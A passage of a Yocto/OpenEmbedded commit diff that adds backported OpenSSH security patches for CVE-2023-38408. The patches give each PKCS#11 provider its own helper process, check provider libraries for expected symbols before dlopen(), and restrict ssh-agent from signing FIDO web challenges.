+@@ -122,7 +248,11 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ u_char *blob = NULL, *signature = NULL;
+ size_t blen, slen = 0;
+ int r, ret = -1;
++ struct helper *helper;
+
++ if ((helper = helper_by_rsa(rsa)) == NULL || helper->fd == -1)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
+ if (padding != RSA_PKCS1_PADDING)
+ goto fail;
+ key = sshkey_new(KEY_UNSPEC);
+@@ -144,10 +274,10 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ (r = sshbuf_put_string(msg, from, flen)) != 0 ||
+ (r = sshbuf_put_u32(msg, 0)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
++ send_msg(helper->fd, msg);
+ sshbuf_reset(msg);
+
+- if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
++ if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
+ if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+ if (slen <= (size_t)RSA_size(rsa)) {
+@@ -163,7 +293,26 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ return (ret);
+ }
+
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
++static int
++rsa_finish(RSA *rsa)
++{
++ struct helper *helper;
++
++ if ((helper = helper_by_rsa(rsa)) == NULL)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: free PKCS11 RSA key for provider %s", __func__, helper->path);
++ if (helper->rsa_finish != NULL)
++ helper->rsa_finish(rsa);
++ if (helper->nrsa == 0)
++ fatal("%s: RSA refcount error", __func__);
++ helper->nrsa--;
++ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
++ if (helper->nrsa == 0 && helper->nec == 0)
++ helper_terminate(helper);
++ return 1;
++}
++
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ const BIGNUM *rp, EC_KEY *ec)
+@@ -175,7 +324,11 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ u_char *blob = NULL, *signature = NULL;
+ size_t blen, slen = 0;
+ int r, nid;
++ struct helper *helper;
+
++ if ((helper = helper_by_ec(ec)) == NULL || helper->fd == -1)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
+ nid = sshkey_ecdsa_key_to_nid(ec);
+ if (nid < 0) {
+ error("%s: couldn't get curve nid", __func__);
+@@ -203,10 +356,10 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ (r = sshbuf_put_string(msg, dgst, dgst_len)) != 0 ||
+ (r = sshbuf_put_u32(msg, 0)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
++ send_msg(helper->fd, msg);
+ sshbuf_reset(msg);
+
+- if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
++ if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
+ if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+ cp = signature;
+@@ -220,75 +373,110 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ sshbuf_free(msg);
+ return (ret);
+ }
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+-static RSA_METHOD *helper_rsa;
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+-static EC_KEY_METHOD *helper_ecdsa;
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
++static void
++ecdsa_do_finish(EC_KEY *ec)
++{
++ struct helper *helper;
++
++ if ((helper = helper_by_ec(ec)) == NULL)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: free PKCS11 ECDSA key for provider %s", __func__, helper->path);
++ if (helper->ec_finish != NULL)
++ helper->ec_finish(ec);
++ if (helper->nec == 0)
++ fatal("%s: ECDSA refcount error", __func__);
++ helper->nec--;
++ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
++ if (helper->nrsa == 0 && helper->nec == 0)
++ helper_terminate(helper);
++}
+
+ /* redirect private key crypto operations to the ssh-pkcs11-helper */
+ static void
+-wrap_key(struct sshkey *k)
++wrap_key(struct helper *helper, struct sshkey *k)
+ {
+- if (k->type == KEY_RSA)
+- RSA_set_method(k->rsa, helper_rsa);
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+- else if (k->type == KEY_ECDSA)
+- EC_KEY_set_method(k->ecdsa, helper_ecdsa);
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+- else
++ debug3("%s: wrap %s for provider %s", __func__, sshkey_type(k), helper->path);
++ if (k->type == KEY_RSA) {
++ RSA_set_method(k->rsa, helper->rsa_meth);
++ if (helper->nrsa++ >= INT_MAX)
++ fatal("%s: RSA refcount error", __func__);
++ } else if (k->type == KEY_ECDSA) {
++ EC_KEY_set_method(k->ecdsa, helper->ec_meth);
++ if (helper->nec++ >= INT_MAX)
++ fatal("%s: EC refcount error", __func__);
++ } else
+ fatal("%s: unknown key type", __func__);
++ k->flags |= SSHKEY_FLAG_EXT;
++ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
+ }
+
+ static int
+-pkcs11_start_helper_methods(void)
++pkcs11_start_helper_methods(struct helper *helper)
+ {
+- if (helper_rsa != NULL)
+- return (0);
+-
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+- int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
++ int (*ec_init)(EC_KEY *key);
++ int (*ec_copy)(EC_KEY *dest, const EC_KEY *src);
++ int (*ec_set_group)(EC_KEY *key, const EC_GROUP *grp);
++ int (*ec_set_private)(EC_KEY *key, const BIGNUM *priv_key);
++ int (*ec_set_public)(EC_KEY *key, const EC_POINT *pub_key);
++ int (*ec_sign)(int, const unsigned char *, int, unsigned char *,
+ unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
+- if (helper_ecdsa != NULL)
+- return (0);
+- helper_ecdsa = EC_KEY_METHOD_new(EC_KEY_OpenSSL());
+- if (helper_ecdsa == NULL)
+- return (-1);
+- EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
+- EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+-
+- if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
++ RSA_METHOD *rsa_meth;
++ EC_KEY_METHOD *ec_meth;
++
++ if ((ec_meth = EC_KEY_METHOD_new(EC_KEY_OpenSSL())) == NULL)
++ return -1;
++ EC_KEY_METHOD_get_sign(ec_meth, &ec_sign, NULL, NULL);
++ EC_KEY_METHOD_set_sign(ec_meth, ec_sign, NULL, ecdsa_do_sign);
++ EC_KEY_METHOD_get_init(ec_meth, &ec_init, &helper->ec_finish,
++ &ec_copy, &ec_set_group, &ec_set_private, &ec_set_public);
++ EC_KEY_METHOD_set_init(ec_meth, ec_init, ecdsa_do_finish,
++ ec_copy, ec_set_group, ec_set_private, ec_set_public);
++
++ if ((rsa_meth = RSA_meth_dup(RSA_get_default_method())) == NULL)
+ fatal("%s: RSA_meth_dup failed", __func__);
+- if (!RSA_meth_set1_name(helper_rsa, "ssh-pkcs11-helper") ||
+- !RSA_meth_set_priv_enc(helper_rsa, rsa_encrypt))
++ helper->rsa_finish = RSA_meth_get_finish(rsa_meth);
++ if (!RSA_meth_set1_name(rsa_meth, "ssh-pkcs11-helper") ||
++ !RSA_meth_set_priv_enc(rsa_meth, rsa_encrypt) ||
++ !RSA_meth_set_finish(rsa_meth, rsa_finish))
+ fatal("%s: failed to prepare method", __func__);
+
+- return (0);
++ helper->ec_meth = ec_meth;
++ helper->rsa_meth = rsa_meth;
++ return 0;
+ }
+
+-static int
+-pkcs11_start_helper(void)
++static struct helper *
++pkcs11_start_helper(const char *path)
+ {
+ int pair[2];
+- char *helper, *verbosity = NULL;
+-
+- if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
+- verbosity = "-vvv";
+-
+- if (pkcs11_start_helper_methods() == -1) {
+- error("pkcs11_start_helper_methods failed");
+- return (-1);
+- }
++ char *prog, *verbosity = NULL;
++ struct helper *helper;
++ pid_t pid;
+
++ if (nhelpers >= INT_MAX)
++ fatal("%s: too many helpers", __func__);
++ debug3("%s: start helper for %s", __func__, path);
+ if (socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == -1) {
+ error("socketpair: %s", strerror(errno));
+- return (-1);
++ return NULL;
++ }
++ helper = xcalloc(1, sizeof(*helper));
++ if (pkcs11_start_helper_methods(helper) == -1) {
++ error("pkcs11_start_helper_methods failed");
++ goto fail;
+ }
+ if ((pid = fork()) == -1) {
+ error("fork: %s", strerror(errno));
+- return (-1);
++ fail:
++ close(pair[0]);
++ close(pair[1]);
++ RSA_meth_free(helper->rsa_meth);
++ EC_KEY_METHOD_free(helper->ec_meth);
++ free(helper);
++ return NULL;
+ } else if (pid == 0) {
+ if ((dup2(pair[1], STDIN_FILENO) == -1) ||
+ (dup2(pair[1], STDOUT_FILENO) == -1)) {
+@@ -297,18 +485,27 @@ pkcs11_start_helper(void)
+ }
+ close(pair[0]);
+ close(pair[1]);
+- helper = getenv("SSH_PKCS11_HELPER");
+- if (helper == NULL || strlen(helper) == 0)
+- helper = _PATH_SSH_PKCS11_HELPER;
++ prog = getenv("SSH_PKCS11_HELPER");
++ if (prog == NULL || strlen(prog) == 0)
++ prog = _PATH_SSH_PKCS11_HELPER;
++ if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
++ verbosity = "-vvv";
+ debug("%s: starting %s %s", __func__, helper,
+ verbosity == NULL ? "" : verbosity);
+- execlp(helper, helper, verbosity, (char *)NULL);
+- fprintf(stderr, "exec: %s: %s\n", helper, strerror(errno));
++ execlp(prog, prog, verbosity, (char *)NULL);
++ fprintf(stderr, "exec: %s: %s\n", prog, strerror(errno));
+ _exit(1);
+ }
+ close(pair[1]);
+- fd = pair[0];
+- return (0);
++ helper->fd = pair[0];
++ helper->path = xstrdup(path);
++ helper->pid = pid;
++ debug3("%s: helper %zu for \"%s\" on fd %d pid %ld", __func__, nhelpers,
++ helper->path, helper->fd, (long)helper->pid);
++ helpers = xrecallocarray(helpers, nhelpers,
++ nhelpers + 1, sizeof(*helpers));
++ helpers[nhelpers++] = helper;
++ return helper;
+ }
+
+ int
+@@ -322,9 +519,11 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ size_t blen;
+ u_int nkeys, i;
+ struct sshbuf *msg;
++ struct helper *helper;
+
+- if (fd < 0 && pkcs11_start_helper() < 0)
+- return (-1);
++ if ((helper = helper_by_provider(name)) == NULL &&
++ (helper = pkcs11_start_helper(name)) == NULL)
++ return -1;
+
+ if ((msg = sshbuf_new()) == NULL)
+ fatal("%s: sshbuf_new failed", __func__);
+@@ -332,10 +531,10 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ (r = sshbuf_put_cstring(msg, name)) != 0 ||
+ (r = sshbuf_put_cstring(msg, pin)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
++ send_msg(helper->fd, msg);
+ sshbuf_reset(msg);
+
+- type = recv_msg(msg);
++ type = recv_msg(helper->fd, msg);
+ if (type == SSH2_AGENT_IDENTITIES_ANSWER) {
+ if ((r = sshbuf_get_u32(msg, &nkeys)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -350,7 +549,7 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ __func__, ssh_err(r));
+ if ((r = sshkey_from_blob(blob, blen, &k)) != 0)
+ fatal("%s: bad key: %s", __func__, ssh_err(r));
+- wrap_key(k);
++ wrap_key(helper, k);
+ (*keysp)[i] = k;
+ if (labelsp)
+ (*labelsp)[i] = label;
+@@ -371,22 +570,15 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ int
+ pkcs11_del_provider(char *name)
+ {
+- int r, ret = -1;
+- struct sshbuf *msg;
+-
+- if ((msg = sshbuf_new()) == NULL)
+- fatal("%s: sshbuf_new failed", __func__);
+- if ((r = sshbuf_put_u8(msg, SSH_AGENTC_REMOVE_SMARTCARD_KEY)) != 0 ||
+- (r = sshbuf_put_cstring(msg, name)) != 0 ||
+- (r = sshbuf_put_cstring(msg, "")) != 0)
+- fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
+- sshbuf_reset(msg);
+-
+- if (recv_msg(msg) == SSH_AGENT_SUCCESS)
+- ret = 0;
+- sshbuf_free(msg);
+- return (ret);
++ struct helper *helper;
++
++ /*
++ * ssh-agent deletes keys before calling this, so the helper entry
++ * should be gone before we get here.
++ */
++ debug3("%s: delete %s", __func__, name);
++ if ((helper = helper_by_provider(name)) != NULL)
++ helper_terminate(helper);
++ return 0;
+ }
+-
+ #endif /* ENABLE_PKCS11 */
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
new file mode 100644
index 0000000000..e16e5e245e
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
@@ -0,0 +1,171 @@
+From 2f1be98e83feb90665b9292eff8bb734537fd491 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 14:02:27 +0000
+Subject: [PATCH 03/12] upstream: Ensure FIDO/PKCS11 libraries contain expected
+ symbols
+
+This checks via nlist(3) that candidate provider libraries contain one
+of the symbols that we will require prior to dlopen(), which can cause
+a number of side effects, including execution of constructors.
+
+Feedback deraadt; ok markus
+
+OpenBSD-Commit-ID: 1508a5fbd74e329e69a55b56c453c292029aefbe
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/29ef8a04866ca14688d5b7fed7b8b9deab851f77]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ misc.c | 77 ++++++++++++++++++++++++++++++++++++++++++++++++++++
+ misc.h | 1 +
+ ssh-pkcs11.c | 4 +++
+ ssh-sk.c | 6 ++--
+ 4 files changed, 86 insertions(+), 2 deletions(-)
+
+diff --git a/misc.c b/misc.c
+index 3a31d5c..8a107e4 100644
+--- a/misc.c
++++ b/misc.c
+@@ -28,6 +28,7 @@
+
+ #include <sys/types.h>
+ #include <sys/ioctl.h>
++#include <sys/mman.h>
+ #include <sys/socket.h>
+ #include <sys/stat.h>
+ #include <sys/time.h>
+@@ -41,6 +42,9 @@
+ #ifdef HAVE_POLL_H
+ #include <poll.h>
+ #endif
++#ifdef HAVE_NLIST_H
++#include <nlist.h>
++#endif
+ #include <signal.h>
+ #include <stdarg.h>
+ #include <stdio.h>
+@@ -2266,3 +2270,76 @@ ssh_signal(int signum, sshsig_t handler)
+ }
+ return osa.sa_handler;
+ }
++
++
++/*
++ * Returns zero if the library at 'path' contains symbol 's', nonzero
++ * otherwise.
++ */
++int
++lib_contains_symbol(const char *path, const char *s)
++{
++#ifdef HAVE_NLIST_H
++ struct nlist nl[2];
++ int ret = -1, r;
++
++ memset(nl, 0, sizeof(nl));
++ nl[0].n_name = xstrdup(s);
++ nl[1].n_name = NULL;
++ if ((r = nlist(path, nl)) == -1) {
++ error("%s: nlist failed for %s", __func__, path);
++ goto out;
++ }
++ if (r != 0 || nl[0].n_value == 0 || nl[0].n_type == 0) {
++ error("%s: library %s does not contain symbol %s", __func__, path, s);
++ goto out;
++ }
++ /* success */
++ ret = 0;
++ out:
++ free(nl[0].n_name);
++ return ret;
++#else /* HAVE_NLIST_H */
++ int fd, ret = -1;
++ struct stat st;
++ void *m = NULL;
++ size_t sz = 0;
++
++ memset(&st, 0, sizeof(st));
++ if ((fd = open(path, O_RDONLY)) < 0) {
++ error("%s: open %s: %s", __func__, path, strerror(errno));
++ return -1;
++ }
++ if (fstat(fd, &st) != 0) {
++ error("%s: fstat %s: %s", __func__, path, strerror(errno));
++ goto out;
++ }
++ if (!S_ISREG(st.st_mode)) {
++ error("%s: %s is not a regular file", __func__, path);
++ goto out;
++ }
++ if (st.st_size < 0 ||
++ (size_t)st.st_size < strlen(s) ||
++ st.st_size >= INT_MAX/2) {
++ error("%s: %s bad size %lld", __func__, path, (long long)st.st_size);
++ goto out;
++ }
++ sz = (size_t)st.st_size;
++ if ((m = mmap(NULL, sz, PROT_READ, MAP_PRIVATE, fd, 0)) == MAP_FAILED ||
++ m == NULL) {
++ error("%s: mmap %s: %s", __func__, path, strerror(errno));
++ goto out;
++ }
++ if (memmem(m, sz, s, strlen(s)) == NULL) {
++ error("%s: %s does not contain expected string %s", __func__, path, s);
++ goto out;
++ }
++ /* success */
++ ret = 0;
++ out:
++ if (m != NULL && m != MAP_FAILED)
++ munmap(m, sz);
++ close(fd);
++ return ret;
++#endif /* HAVE_NLIST_H */
++}
+diff --git a/misc.h b/misc.h
+index 4a05db2..3f9f4db 100644
+--- a/misc.h
++++ b/misc.h
+@@ -86,6 +86,7 @@ const char *atoi_err(const char *, int *);
+ int parse_absolute_time(const char *, uint64_t *);
+ void format_absolute_time(uint64_t, char *, size_t);
+ int path_absolute(const char *);
++int lib_contains_symbol(const char *, const char *);
+
+ void sock_set_v6only(int);
+
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index b56a41b..639a6f7 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -1499,6 +1499,10 @@ pkcs11_register_provider(char *provider_id, char *pin,
+ __func__, provider_id);
+ goto fail;
+ }
++ if (lib_contains_symbol(provider_id, "C_GetFunctionList") != 0) {
++ error("provider %s is not a PKCS11 library", provider_id);
++ goto fail;
++ }
+ /* open shared pkcs11-library */
+ if ((handle = dlopen(provider_id, RTLD_NOW)) == NULL) {
+ error("dlopen %s failed: %s", provider_id, dlerror());
+diff --git a/ssh-sk.c b/ssh-sk.c
+index 5ff9381..9df12cc 100644
+--- a/ssh-sk.c
++++ b/ssh-sk.c
+@@ -119,10 +119,12 @@ sshsk_open(const char *path)
+ #endif
+ return ret;
+ }
+- if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL) {
+- error("Provider \"%s\" dlopen failed: %s", path, dlerror());
++ if (lib_contains_symbol(path, "sk_api_version") != 0) {
++ error("provider %s is not an OpenSSH FIDO library", path);
+ goto fail;
+ }
++ if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL)
++ fatal("Provider \"%s\" dlopen failed: %s", path, dlerror());
+ if ((ret->sk_api_version = dlsym(ret->dlhandle,
+ "sk_api_version")) == NULL) {
+ error("Provider \"%s\" dlsym(sk_api_version) failed: %s",
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
new file mode 100644
index 0000000000..5e8040c9bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
@@ -0,0 +1,34 @@
+From 0862f338941bfdfb2cadee87de6d5fdca1b8f457 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 13:55:53 +0000
+Subject: [PATCH 04/12] upstream: terminate process if requested to load a
+ PKCS#11 provider that isn't a PKCS#11 provider; from / ok markus@
+
+OpenBSD-Commit-ID: 39532cf18b115881bb4cfaee32084497aadfa05c
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/892506b13654301f69f9545f48213fc210e5c5cc]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11.c | 6 ++----
+ 1 file changed, 2 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index 639a6f7..7530acc 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -1508,10 +1508,8 @@ pkcs11_register_provider(char *provider_id, char *pin,
+ error("dlopen %s failed: %s", provider_id, dlerror());
+ goto fail;
+ }
+- if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL) {
+- error("dlsym(C_GetFunctionList) failed: %s", dlerror());
+- goto fail;
+- }
++ if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL)
++ fatal("dlsym(C_GetFunctionList) failed: %s", dlerror());
+ p = xcalloc(1, sizeof(*p));
+ p->name = xstrdup(provider_id);
+ p->handle = handle;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
new file mode 100644
index 0000000000..0ddbdc68d4
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
@@ -0,0 +1,194 @@
+From a6cee3905edf070c0de135d3f2ee5b74da1dbd28 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 May 2020 01:26:58 +0000
+Subject: [PATCH 05/12] upstream: Restrict ssh-agent from signing web
+ challenges for FIDO
+
+keys.
+
+When signing messages in ssh-agent using a FIDO key that has an
+application string that does not start with "ssh:", ensure that the
+message being signed is one of the forms expected for the SSH protocol
+(currently pubkey authentication and sshsig signatures).
+
+This prevents ssh-agent forwarding on a host that has FIDO keys
+attached granting the ability for the remote side to sign challenges
+for web authentication using those keys too.
+
+Note that the converse case of web browsers signing SSH challenges is
+already precluded because no web RP can have the "ssh:" prefix in the
+application string that we require.
+
+ok markus@
+
+OpenBSD-Commit-ID: 9ab6012574ed0352d2f097d307f4a988222d1b19
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/0c111eb84efba7c2a38b2cc3278901a0123161b9]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 110 +++++++++++++++++++++++++++++++++++++++++++++++-----
+ 1 file changed, 100 insertions(+), 10 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index ceb348c..1794f35 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.255 2020/02/06 22:30:54 naddy Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -77,6 +77,7 @@
+
+ #include "xmalloc.h"
+ #include "ssh.h"
++#include "ssh2.h"
+ #include "sshbuf.h"
+ #include "sshkey.h"
+ #include "authfd.h"
+@@ -167,6 +168,9 @@ static long lifetime = 0;
+
+ static int fingerprint_hash = SSH_FP_HASH_DEFAULT;
+
++/* Refuse signing of non-SSH messages for web-origin FIDO keys */
++static int restrict_websafe = 1;
++
+ static void
+ close_socket(SocketEntry *e)
+ {
+@@ -282,6 +286,80 @@ agent_decode_alg(struct sshkey *key, u_int flags)
+ return NULL;
+ }
+
++/*
++ * This function inspects a message to be signed by a FIDO key that has a
++ * web-like application string (i.e. one that does not begin with "ssh:".
++ * It checks that the message is one of those expected for SSH operations
++ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
++ * for the web.
++ */
++static int
++check_websafe_message_contents(struct sshkey *key,
++ const u_char *msg, size_t len)
++{
++ int matched = 0;
++ struct sshbuf *b;
++ u_char m, n;
++ char *cp1 = NULL, *cp2 = NULL;
++ int r;
++ struct sshkey *mkey = NULL;
++
++ if ((b = sshbuf_from(msg, len)) == NULL)
++ fatal("%s: sshbuf_new", __func__);
++
++ /* SSH userauth request */
++ if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
++ (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
++ (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
++ (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
++ (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
++ (r = sshkey_froms(b, &mkey)) == 0 && /* key */
++ sshbuf_len(b) == 0) {
++ debug("%s: parsed userauth", __func__);
++ if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
++ strcmp(cp1, "ssh-connection") == 0 &&
++ strcmp(cp2, "publickey") == 0 &&
++ sshkey_equal(key, mkey)) {
++ debug("%s: well formed userauth", __func__);
++ matched = 1;
++ }
++ }
++ free(cp1);
++ free(cp2);
++ sshkey_free(mkey);
++ sshbuf_free(b);
++ if (matched)
++ return 1;
++
++ if ((b = sshbuf_from(msg, len)) == NULL)
++ fatal("%s: sshbuf_new", __func__);
++ cp1 = cp2 = NULL;
++ mkey = NULL;
++
++ /* SSHSIG */
++ if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
++ (r = sshbuf_consume(b, 6)) == 0 &&
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
++ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
++ (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
++ sshbuf_len(b) == 0) {
++ debug("%s: parsed sshsig", __func__);
++ matched = 1;
++ }
++
++ sshbuf_free(b);
++ if (matched)
++ return 1;
++
++ /* XXX CA signature operation */
++
++ error("web-origin key attempting to sign non-SSH message");
++ return 0;
++}
++
+ /* ssh2 only */
+ static void
+ process_sign_request2(SocketEntry *e)
+@@ -314,14 +392,20 @@ process_sign_request2(SocketEntry *e)
+ verbose("%s: user refused key", __func__);
+ goto send;
+ }
+- if (sshkey_is_sk(id->key) &&
+- (id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
+- if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
+- SSH_FP_DEFAULT)) == NULL)
+- fatal("%s: fingerprint failed", __func__);
+- notifier = notify_start(0,
+- "Confirm user presence for key %s %s",
+- sshkey_type(id->key), fp);
++ if (sshkey_is_sk(id->key)) {
++ if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
++ !check_websafe_message_contents(key, data, dlen)) {
++ /* error already logged */
++ goto send;
++ }
++ if ((id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
++ if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
++ SSH_FP_DEFAULT)) == NULL)
++ fatal("%s: fingerprint failed", __func__);
++ notifier = notify_start(0,
++ "Confirm user presence for key %s %s",
++ sshkey_type(id->key), fp);
++ }
+ }
+ if ((r = sshkey_sign(id->key, &signature, &slen,
+ data, dlen, agent_decode_alg(key, flags),
+@@ -1214,7 +1298,7 @@ main(int ac, char **av)
+ __progname = ssh_get_progname(av[0]);
+ seed_rng();
+
+- while ((ch = getopt(ac, av, "cDdksE:a:P:t:")) != -1) {
++ while ((ch = getopt(ac, av, "cDdksE:a:O:P:t:")) != -1) {
+ switch (ch) {
+ case 'E':
+ fingerprint_hash = ssh_digest_alg_by_name(optarg);
+@@ -1229,6 +1313,12 @@ main(int ac, char **av)
+ case 'k':
+ k_flag++;
+ break;
++ case 'O':
++ if (strcmp(optarg, "no-restrict-websafe") == 0)
++ restrict_websafe = 0;
++ else
++ fatal("Unknown -O option");
++ break;
+ case 'P':
+ if (provider_whitelist != NULL)
+ fatal("-P option already specified");
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
new file mode 100644
index 0000000000..ac494aab0b
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
@@ -0,0 +1,73 @@
+From a5d845b7b42861d18f43e83de9f24c7374d1b458 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 18 Sep 2020 08:16:38 +0000
+Subject: [PATCH 06/12] upstream: handle multiple messages in a single read()
+
+PR#183 by Dennis Kaarsemaker; feedback and ok markus@
+
+OpenBSD-Commit-ID: 8570bb4d02d00cf70b98590716ea6a7d1cce68d1
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/52a03e9fca2d74eef953ddd4709250f365ca3975]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 19 +++++++++++++------
+ 1 file changed, 13 insertions(+), 6 deletions(-)
+
